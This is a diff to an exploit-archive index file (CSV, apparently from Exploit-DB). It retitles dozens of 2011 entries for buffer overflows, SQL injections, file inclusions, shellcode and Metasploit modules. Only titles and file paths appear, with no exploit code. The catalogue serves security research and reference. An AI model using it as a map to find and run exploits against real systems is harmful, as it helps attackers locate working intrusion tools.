Overflow",2011-03-11,mr_me,linux,dos,0 16961,platforms/php/webapps/16961.py,"N_CMS 1.1E Pre-Auth - Local File Inclusion Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0 @@ -14772,7 +14772,7 @@ id,file,description,date,author,platform,type,port 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple XSS Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - (.lst) Buffer Overflow Exploit (SEH)",2011-03-14,h1ch4m,windows,local,0 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - (.fcd) Buffer Overflow Exploit",2011-03-14,h1ch4m,windows,local,0 -16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 Javascript File Write",2011-03-14,Metasploit,windows,local,0 +16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - Javascript File Write",2011-03-14,Metasploit,windows,local,0 16979,platforms/windows/dos/16979.html,"Opera 11.01 NULL PTR Derefernce",2011-03-15,echo,windows,dos,0 16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (1)",2011-03-15,TecR0c,php,webapps,0 16982,platforms/php/webapps/16982.txt,"lotuscms 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0 @@ -14789,7 +14789,7 @@ id,file,description,date,author,platform,type,port 16995,platforms/php/webapps/16995.txt,"Joomla com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0 16996,platforms/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash PoC",2011-03-17,"Anastasios Monachos",windows,dos,0 16997,platforms/php/webapps/16997.txt,"Tugux CMS 1.0_final - Multiple Vulnerabilities",2011-03-17,Aodrulez,php,webapps,0 -16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer CDDA URI Initialization",2011-03-17,Metasploit,windows,remote,0 +16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer - CDDA URI Initialization",2011-03-17,Metasploit,windows,remote,0 16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - SEH Exploit",2011-03-18,"Anastasios Monachos",windows,local,0 17000,platforms/php/webapps/17000.txt,"Tugux CMS (nid) BLIND SQL Injection",2011-03-18,eidelweiss,php,webapps,0 17001,platforms/windows/local/17001.pl,"CORE Multimedia Suite 2011 CORE Player 2.4 - Buffer Overflow (.m3u)",2011-03-18,Rh0,windows,local,0 @@ -14817,8 +14817,8 @@ id,file,description,date,author,platform,type,port 17026,platforms/windows/webapps/17026.txt,"Symantec LiveUpdate Administrator Management GUI HTML Injection",2011-03-23,"Nikolas Sotiriu",windows,webapps,0 17027,platforms/windows/remote/17027.rb,"Adobe Flash Player - AVM Bytecode Verification",2011-03-23,Metasploit,windows,remote,0 17028,platforms/windows/remote/17028.rb,"HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 -17029,platforms/windows/remote/17029.rb,"HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 -17030,platforms/windows/remote/17030.rb,"HP NNM CGI webappmon.exe execvp Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 +17029,platforms/windows/remote/17029.rb,"HP NNM - CGI webappmon.exe OvJavaLocale Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 +17030,platforms/windows/remote/17030.rb,"HP NNM - CGI webappmon.exe execvp Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 17031,platforms/linux/remote/17031.rb,"Distributed Ruby send syscall",2011-03-23,Metasploit,linux,remote,0 17032,platforms/windows/dos/17032.txt,"VMCPlayer 1.0 - Denial of Service",2011-03-23,BraniX,windows,dos,0 17033,platforms/windows/dos/17033.py,"IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS",2011-03-23,"Jeremy Brown",windows,dos,0 @@ -14826,16 +14826,16 @@ id,file,description,date,author,platform,type,port 17035,platforms/php/webapps/17035.pl,"Constructr CMS 3.03 - Arbitrary File Upload",2011-03-23,plucky,php,webapps,0 17036,platforms/asp/webapps/17036.txt,"Web Wiz Forum Injection",2011-03-23,eXeSoul,asp,webapps,0 17037,platforms/windows/remote/17037.rb,"PostgreSQL for Microsoft Windows Payload Execution",2011-03-23,Metasploit,windows,remote,0 -17038,platforms/windows/remote/17038.rb,"HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow",2011-03-24,Metasploit,windows,remote,80 -17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow",2011-03-23,Metasploit,windows,remote,80 -17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow",2011-03-24,Metasploit,windows,remote,80 -17041,platforms/windows/remote/17041.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow",2011-03-23,Metasploit,windows,remote,80 -17042,platforms/windows/remote/17042.rb,"HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow",2011-03-24,Metasploit,windows,remote,80 -17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 -17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 +17038,platforms/windows/remote/17038.rb,"HP OpenView NNM - nnmRptConfig.exe schdParams Buffer Overflow",2011-03-24,Metasploit,windows,remote,80 +17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager - snmpviewer.exe Buffer Overflow",2011-03-23,Metasploit,windows,remote,80 +17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager - getnnmdata.exe (ICount) CGI Buffer Overflow",2011-03-24,Metasploit,windows,remote,80 +17041,platforms/windows/remote/17041.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe main Buffer Overflow",2011-03-23,Metasploit,windows,remote,80 +17042,platforms/windows/remote/17042.rb,"HP OpenView Network Node Manager - getnnmdata.exe (MaxAge) CGI Buffer Overflow",2011-03-24,Metasploit,windows,remote,80 +17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 +17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe ovutil Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - DoS",2011-03-24,"Craig Freyman",windows,dos,69 17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",php,webapps,0 -17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,Metasploit,windows,remote,0 +17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager - getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,Metasploit,windows,remote,0 17048,platforms/windows/remote/17048.rb,"VLC - AMV Dangling Pointer",2011-03-26,Metasploit,windows,remote,0 17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0 17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0 @@ -14859,7 +14859,7 @@ id,file,description,date,author,platform,type,port 17076,platforms/php/webapps/17076.txt,"YaCOMAS 0.3.6 Alpha - Multiple Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 17077,platforms/php/webapps/17077.txt,"pligg CMS 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps,0 17078,platforms/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution (ZDI-11-113)",2011-03-30,ikki,multiple,remote,0 -17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script SQL Injection",2011-03-30,Net.Edit0r,php,webapps,0 +17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,php,webapps,0 17080,platforms/php/webapps/17080.txt,"Bigace 2.7.5 - Remote File Upload",2011-03-30,Net.Edit0r,php,webapps,0 17081,platforms/asp/webapps/17081.txt,"CosmoQuest Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0 17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0 @@ -14886,7 +14886,7 @@ id,file,description,date,author,platform,type,port 17104,platforms/windows/remote/17104.txt,"RealNetworks RealGames StubbyUtil.ShellCtl.1 - ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 17105,platforms/windows/remote/17105.txt,"RealNetworks RealGames StubbyUtil.ProcessMgr.1 - ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 17106,platforms/php/webapps/17106.txt,"Rash CMS - SQL Injection",2011-04-03,keracker,php,webapps,0 -17107,platforms/php/webapps/17107.txt,"Banner Ad Management Script SQL Injection",2011-04-03,Egyptian.H4x0rz,php,webapps,0 +17107,platforms/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,php,webapps,0 17108,platforms/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusion",2011-04-03,KedAns-Dz,php,webapps,0 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) / chmod(_/etc/shadow__ 0666) / exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 17431,platforms/php/webapps/17431.txt,"Same Team E-shop manager - SQL Injection Exploit",2011-06-22,"Number 7",php,webapps,0 @@ -14925,11 +14925,11 @@ id,file,description,date,author,platform,type,port 17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - (.zip) Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection",2011-04-11,R3d-D3V!L,php,webapps,0 17147,platforms/linux/local/17147.txt,"tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation",2011-04-11,ph0x90bic,linux,local,0 -17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge Arbitrary Java Code Execution",2011-04-05,Metasploit,multiple,remote,10001 +17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge - Arbitrary Java Code Execution",2011-04-05,Metasploit,multiple,remote,10001 17149,platforms/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",2011-04-09,Metasploit,windows,remote,0 -17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 RTX Buffer Overflow",2011-04-08,Metasploit,windows,local,0 +17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 - RTX Buffer Overflow",2011-04-08,Metasploit,windows,local,0 17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar MAILTO Buffer Overflow",2011-04-04,Metasploit,windows,remote,25 -17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager Authenticated Code Execution",2011-04-08,Metasploit,windows,remote,9090 +17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager - Authenticated Code Execution",2011-04-08,Metasploit,windows,remote,9090 17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro 1.70 - (.visprj) Buffer Overflow",2011-04-11,Metasploit,windows,local,0 17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' RCE Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0 17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0 @@ -14947,7 +14947,7 @@ id,file,description,date,author,platform,type,port 17170,platforms/php/webapps/17170.txt,"EZ-Shop 1.02 - Lateral SQL Injection",2011-04-14,Osirys,php,webapps,0 17171,platforms/windows/local/17171.pl,"SimplyPlay 66 - (.pls) Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",windows,local,0 17172,platforms/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps,0 -17173,platforms/php/webapps/17173.txt,"TextAds 2.08 Script Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",php,webapps,0 +17173,platforms/php/webapps/17173.txt,"TextAds 2.08 Script - Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",php,webapps,0 17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 Post-authentication Local File Inclusion/Edit",2011-04-15,bitform,multiple,webapps,0 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 - SWF Memory Corruption",2011-04-16,Metasploit,windows,remote,0 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload",2011-04-16,Alexander,asp,webapps,0 @@ -14991,7 +14991,7 @@ id,file,description,date,author,platform,type,port 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - (.m3u) SEH Unicode Buffer Overflow",2011-04-28,Metasploit,windows,local,0 17226,platforms/php/webapps/17226.txt,"phpGraphy 0.9.13b - Multiple Vulnerabilities",2011-04-29,"High-Tech Bridge SA",php,webapps,0 17227,platforms/windows/dos/17227.py,"Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC",2011-04-29,webDEViL,windows,dos,0 -17228,platforms/asp/webapps/17228.txt,"SOOP Portal Raven 1.0b SQL Injection",2011-04-29,Evil-Thinker,asp,webapps,0 +17228,platforms/asp/webapps/17228.txt,"SOOP Portal Raven 1.0b - SQL Injection",2011-04-29,Evil-Thinker,asp,webapps,0 17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 - (.s3m) Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 - (.s3m) Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 17231,platforms/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,php,webapps,0 @@ -15011,14 +15011,14 @@ id,file,description,date,author,platform,type,port 17248,platforms/php/webapps/17248.txt,"PHPDug 2.0.0 - Multiple Vulnerabilities",2011-05-06,"High-Tech Bridge SA",php,webapps,0 17250,platforms/php/webapps/17250.txt,"phpThumb 'phpThumbDebug' Information Disclosure",2011-05-06,mook,php,webapps,0 17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - CSRF",2011-05-06,"High-Tech Bridge SA",php,webapps,0 -17252,platforms/windows/remote/17252.rb,"VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow",2011-04-08,Metasploit,windows,remote,0 +17252,platforms/windows/remote/17252.rb,"VideoLAN VLC - ModPlug ReadS3M Stack Buffer Overflow",2011-04-08,Metasploit,windows,remote,0 17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal",2011-05-07,"Raffaele Forte",cgi,webapps,0 17264,platforms/php/webapps/17264.txt,"Joomla Component com_versioning - SQLi",2011-05-09,the_cyber_nuxbie,php,webapps,0 17265,platforms/php/webapps/17265.txt,"Joomla Component com_hello - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0 17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection",2011-05-10,ScOrPiOn,php,webapps,0 -17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 Content-Type Buffer Overflow",2011-05-11,Metasploit,windows,remote,0 -17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI ActiveX Buffer Overflow",2011-05-10,Metasploit,windows,remote,0 +17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 - Content-Type Buffer Overflow",2011-05-11,Metasploit,windows,remote,0 +17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI - ActiveX Buffer Overflow",2011-05-10,Metasploit,windows,remote,0 17270,platforms/windows/local/17270.pl,"Chasys Media Player 2.0 - Buffer Overflow Exploit (SEH)",2011-05-11,h1ch4m,windows,local,0 17277,platforms/windows/local/17277.pl,"A-PDF Wav to MP3 Converter 1.2.0 - DEP Bypass",2011-05-13,h1ch4m,windows,local,0 17278,platforms/windows/dos/17278.pl,"Adobe Audition 3.0 - (build 7283) Session File Handling Buffer Overflow PoC",2011-05-13,LiquidWorm,windows,dos,0 @@ -15077,12 +15077,12 @@ id,file,description,date,author,platform,type,port 17343,platforms/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0 17344,platforms/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - LFI",2011-05-29,"Treasure Priyamal",php,webapps,0 17346,platforms/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload Exploit",2011-05-30,"Treasure Priyamal",php,webapps,0 -17347,platforms/php/webapps/17347.php,"Easy Media Script SQL Injection",2011-05-30,Lagripe-Dz,php,webapps,0 -17349,platforms/hardware/webapps/17349.txt,"Belkin G Wireless Router F5D7234-4 v5 Exploit",2011-05-30,Aodrulez,hardware,webapps,0 +17347,platforms/php/webapps/17347.php,"Easy Media Script - SQL Injection",2011-05-30,Lagripe-Dz,php,webapps,0 +17349,platforms/hardware/webapps/17349.txt,"Belkin G Wireless Router F5D7234-4 v5 - Exploit",2011-05-30,Aodrulez,hardware,webapps,0 17350,platforms/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injection",2011-05-30,v3n0m,php,webapps,0 17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,Metasploit,windows,remote,0 -17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW series auth bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 +17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series auth bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication BoF",2011-06-01,b33f,windows,remote,0 17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow",2011-06-02,Metasploit,windows,remote,21 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 @@ -15094,7 +15094,7 @@ id,file,description,date,author,platform,type,port 17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 - (.zip) Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos,0 17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows XP SP3 DEP Bypass)",2011-06-06,"dookie and ronin",windows,local,0 17365,platforms/windows/remote/17365.py,"IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM Exploit",2011-06-07,"Jeremy Brown",windows,remote,0 -17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0 +17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0 17367,platforms/php/webapps/17367.html,"Dataface Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 17373,platforms/windows/remote/17373.py,"ActFax Server FTP - Remote BoF (post auth) Bigger Buffer",2011-06-08,b33f,windows,remote,0 @@ -15139,13 +15139,13 @@ id,file,description,date,author,platform,type,port 17414,platforms/php/webapps/17414.txt,"Joomla Component Calc Builder - (id) Blind SQL Injection",2011-06-19,"Chip d3 bi0s",php,webapps,0 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 -17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,Metasploit,windows,remote,0 +17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 - On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,Metasploit,windows,remote,0 17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service PoC",2011-06-20,BraniX,windows,dos,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,hardware,remote,0 17423,platforms/php/webapps/17423.txt,"WPtouch WordPress Plugin 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 -17424,platforms/windows/remote/17424.rb,"Black Ice Cover Page ActiveX Control Arbitrary File Download",2011-06-21,Metasploit,windows,remote,0 +17424,platforms/windows/remote/17424.rb,"Black Ice Cover Page - ActiveX Control Arbitrary File Download",2011-06-21,Metasploit,windows,remote,0 17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection",2011-06-21,"Brendan Coles",php,webapps,0 17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0 17429,platforms/windows/remote/17429.rb,"FactoryLink vrn.exe - Opcode 9 Buffer Overflow",2011-06-21,Metasploit,windows,remote,0 @@ -15163,9 +15163,9 @@ id,file,description,date,author,platform,type,port 17445,platforms/php/webapps/17445.txt,"2Point Solutions - (cmspages.php) SQL Injection",2011-06-23,"Newbie Campuz",php,webapps,0 17446,platforms/php/webapps/17446.txt,"nodesforum 1.059 - Remote File Inclusion",2011-06-23,bd0rk,php,webapps,0 17449,platforms/windows/local/17449.py,"FreeAmp 2.0.7 - (.pls) Buffer Overflow Exploit",2011-06-24,"C4SS!0 G0M3S",windows,local,0 -17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",2011-06-25,Metasploit,windows,remote,0 +17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 - CSService Logging Path Param Buffer Overflow",2011-06-25,Metasploit,windows,remote,0 17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,Metasploit,windows,remote,0 -17451,platforms/windows/local/17451.rb,"Microsoft Office Visio VISIODWG.DLL DXF File Handling",2011-06-26,Metasploit,windows,local,0 +17451,platforms/windows/local/17451.rb,"Microsoft Office Visio - VISIODWG.DLL DXF File Handling",2011-06-26,Metasploit,windows,local,0 17452,platforms/php/webapps/17452.txt,"JoomlaXi - Persistent XSS",2011-06-26,"Karthik R",php,webapps,0 17453,platforms/php/webapps/17453.txt,"WordPress Beer Recipes Plugin 1.0 - XSS",2011-06-26,TheUzuki.',php,webapps,0 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection",2011-06-28,hamt0ry,php,webapps,0 @@ -15240,7 +15240,7 @@ id,file,description,date,author,platform,type,port 17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection",2011-07-14,Netrondoank,php,webapps,0 17535,platforms/multiple/remote/17535.rb,"Java RMI Server Insecure Default Configuration Java Code Execution",2011-07-15,Metasploit,multiple,remote,0 40085,platforms/windows/local/40085.rb,"Windows 7 SP1 - mrxdav.sys WebDav Local Privilege Escalation (MS16-016)",2016-07-11,Metasploit,windows,local,0 -17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",2011-07-16,Metasploit,windows,remote,0 +17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Cookie Handling Buffer Overflow",2011-07-16,Metasploit,windows,remote,0 17539,platforms/windows/remote/17539.rb,"FreeFloat FTP Server 1.00 - MKD Buffer Overflow Exploit",2011-07-17,"C4SS!0 G0M3S",windows,remote,0 17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server - MKD Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",windows,remote,0 17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer Overflow",2011-07-17,Metasploit,windows,remote,0 @@ -15287,7 +15287,7 @@ id,file,description,date,author,platform,type,port 17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - CSRF",2011-08-01,Xadpritox,php,webapps,0 17593,platforms/php/webapps/17593.txt,"Zoneminder 1.24.3 - Remote File Inclusion",2011-08-01,iye,php,webapps,0 17595,platforms/php/webapps/17595.txt,"MyBB MyTabs (plugin) - SQL Injection (0Day)",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 -17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC Credential Information Disclosure",2011-08-01,Metasploit,jsp,webapps,0 +17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC - Credential Information Disclosure",2011-08-01,Metasploit,jsp,webapps,0 17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server - DoS",2011-08-03,"Craig Freyman",windows,dos,0 @@ -15302,7 +15302,7 @@ id,file,description,date,author,platform,type,port 17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass) (Metasploit)",2011-08-05,Rh0,windows,remote,0 17613,platforms/php/webapps/17613.php,"WordPress Plugin E-commerce 3.8.4 - SQL Injection Exploit",2011-08-05,IHTeam,php,webapps,0 17614,platforms/hp-ux/remote/17614.sh,"HP Data Protector - Remote Shell for HP-UX",2011-08-05,"Adrian Puente Z.",hp-ux,remote,0 -17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server Authenticated Code Execution",2011-08-05,Metasploit,jsp,webapps,0 +17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server - Authenticated Code Execution",2011-08-05,Metasploit,jsp,webapps,0 17616,platforms/php/webapps/17616.txt,"WordPress ProPlayer plugin 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 17617,platforms/php/webapps/17617.txt,"WordPress Social Slider plugin 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server DoS (Write command)",2011-08-05,"SecPod Research",windows,dos,0 @@ -15369,7 +15369,7 @@ id,file,description,date,author,platform,type,port 17695,platforms/php/webapps/17695.txt,"phpMyRealty 1.0.7 - SQL Injection",2011-08-19,H4T$A,php,webapps,0 17694,platforms/php/webapps/17694.txt,"network tracker .95 - Stored XSS",2011-08-19,G13,php,webapps,0 17696,platforms/multiple/dos/17696.pl,"Apache httpd - Remote Denial of Service (Memory Exhaustion)",2011-08-19,kingcope,multiple,dos,0 -17697,platforms/windows/remote/17697.rb,"HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution",2011-08-20,Metasploit,windows,remote,0 +17697,platforms/windows/remote/17697.rb,"HP Easy Printer Care - XMLSimpleAccessor Class ActiveX Control Remote Code Execution",2011-08-20,Metasploit,windows,remote,0 17698,platforms/php/webapps/17698.rb,"Oracle Secure Backup Authentication Bypass/Command Injection",2011-08-19,Metasploit,php,webapps,0 17699,platforms/windows/remote/17699.rb,"Symantec System Center Alert Management System - (xfr.exe) Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System - (hndlrsvc.exe) Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 @@ -15380,7 +15380,7 @@ id,file,description,date,author,platform,type,port 17706,platforms/php/webapps/17706.pl,"onefilecms 1.1.1 - Multiple Vulnerabilities",2011-08-21,mr.pr0n,php,webapps,0 17707,platforms/php/webapps/17707.txt,"WordPress MM Duplicate plugin 1.2 - SQL Injection",2011-08-22,"Miroslav Stampar",php,webapps,0 17708,platforms/php/webapps/17708.txt,"Web Solutions Wcs2u SQL Injection",2011-08-22,tempe_mendoan,php,webapps,0 